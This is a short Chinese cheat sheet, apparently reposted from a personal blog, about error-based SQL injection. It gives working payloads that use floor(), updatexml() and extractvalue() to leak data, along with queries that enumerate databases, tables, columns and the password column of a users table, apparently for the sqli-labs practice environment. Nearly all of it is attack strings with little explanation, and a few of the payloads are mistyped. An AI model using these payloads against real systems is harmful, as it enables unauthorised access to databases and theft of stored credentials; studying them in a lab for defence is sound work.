码迷,mamicode.com
首页 > 数据库 > 详细

sql注入

时间:2021-04-08 13:32:03      阅读:0      评论:0      收藏:0      [点我收藏+]

标签:and   data-   group   select   函数   group by   sch   security   ati   

sql报错注入

1.报错函数

(1).floor()报错

语句:

?id=1‘ union select 1,count(),concat(payload,floor(rand(0)2))x from information_schema.columns group by x --+

(2).updatexml()报错

语句:

?id=1%27 and updatexml(1,concat(0x26,payload,0x26),1);---+

(3).exvalue()报错

?id=1′ and extractvalue(1,concat(0x26,database(),0x26));--+

  • 注:这些函数都只能爆出32位字符

2.查询payload

1.查数据库:database()

2.查表(要加括号):select table_name from information_schema.tables where table_schema=‘security‘ limit 3,1

3.列:select column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 1,1

4.字段:select password from users limit 0,1

 

 

sql注入

标签:and   data-   group   select   函数   group by   sch   security   ati   

原文地址:https://www.cnblogs.com/everythingispossible/p/14622695.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!